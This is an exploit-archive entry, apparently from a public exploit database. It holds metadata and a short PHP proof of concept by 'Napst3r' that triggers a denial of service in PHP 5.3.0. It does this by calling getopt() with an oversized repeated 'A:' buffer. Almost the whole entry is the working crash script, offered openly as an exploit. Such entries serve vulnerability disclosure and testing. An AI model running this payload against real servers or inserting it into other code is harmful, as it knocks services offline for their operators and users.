PHP 5.3.0 - 'getopt()' Denial of Service
Author: Napst3r
type: dos
platform: multiple
port:
date_added: 2010-04-11
date_updated: 2017-02-01
verified: 0
codes:
tags:
aliases:
screenshot_url:
application_url:
<?php
#####################################################################
## PHP 5.3.0 getopt() Denial of service
## Tested on WIN XP FR SP3, WIN VISTA FR SP2, Apache, PHP 5.3.0
## Denial of service
## Author: Napst3r
## Greets To: My Laptop & all My Friends
#####################################################################
$buffer = str_repeat('A:', 9999);
$options = getopt($buffer);
?>